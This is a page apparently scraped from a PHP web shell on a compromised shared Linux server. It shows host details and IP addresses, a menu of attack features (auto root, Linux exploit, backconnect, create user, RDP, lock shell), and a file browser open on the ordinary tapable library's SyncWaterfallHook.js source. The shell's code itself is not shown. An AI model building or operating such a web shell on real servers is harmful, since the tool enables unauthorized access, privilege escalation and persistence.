Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
nodejs /
tapable /
lib /
[ HOME SHELL ]
Name
Size
Permission
Action
AsyncParallelBailHook.js
2.12
KB
-rw-r--r--
AsyncParallelHook.js
721
B
-rw-r--r--
AsyncSeriesBailHook.js
851
B
-rw-r--r--
AsyncSeriesHook.js
711
B
-rw-r--r--
AsyncSeriesLoopHook.js
728
B
-rw-r--r--
AsyncSeriesWaterfallHook.js
1.06
KB
-rw-r--r--
Hook.js
4.29
KB
-rw-r--r--
HookCodeFactory.js
8.79
KB
-rw-r--r--
HookMap.js
995
B
-rw-r--r--
MultiHook.js
837
B
-rw-r--r--
SyncBailHook.js
922
B
-rw-r--r--
SyncHook.js
785
B
-rw-r--r--
SyncLoopHook.js
810
B
-rw-r--r--
SyncWaterfallHook.js
1.18
KB
-rw-r--r--
Tapable.js
1.91
KB
-rw-r--r--
index.js
790
B
-rw-r--r--
simpleAsyncCases.js
4.48
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : SyncWaterfallHook.js
/* MIT License http://www.opensource.org/licenses/mit-license.php Author Tobias Koppers @sokra */ "use strict"; const Hook = require("./Hook"); const HookCodeFactory = require("./HookCodeFactory"); class SyncWaterfallHookCodeFactory extends HookCodeFactory { content({ onError, onResult, onDone, rethrowIfPossible }) { return this.callTapsSeries({ onError: (i, err) => onError(err), onResult: (i, result, next) => { let code = ""; code += `if(${result} !== undefined) {\n`; code += `${this._args[0]} = ${result};\n`; code += `}\n`; code += next(); return code; }, onDone: () => onResult(this._args[0]), rethrowIfPossible }); } } const factory = new SyncWaterfallHookCodeFactory(); class SyncWaterfallHook extends Hook { constructor(args) { super(args); if(args.length < 1) throw new Error("Waterfall hooks must have at least one argument"); } tapAsync() { throw new Error("tapAsync is not supported on a SyncWaterfallHook"); } tapPromise() { throw new Error("tapPromise is not supported on a SyncWaterfallHook"); } compile(options) { factory.setup(this, options); return factory.create(options); } } module.exports = SyncWaterfallHook;
Close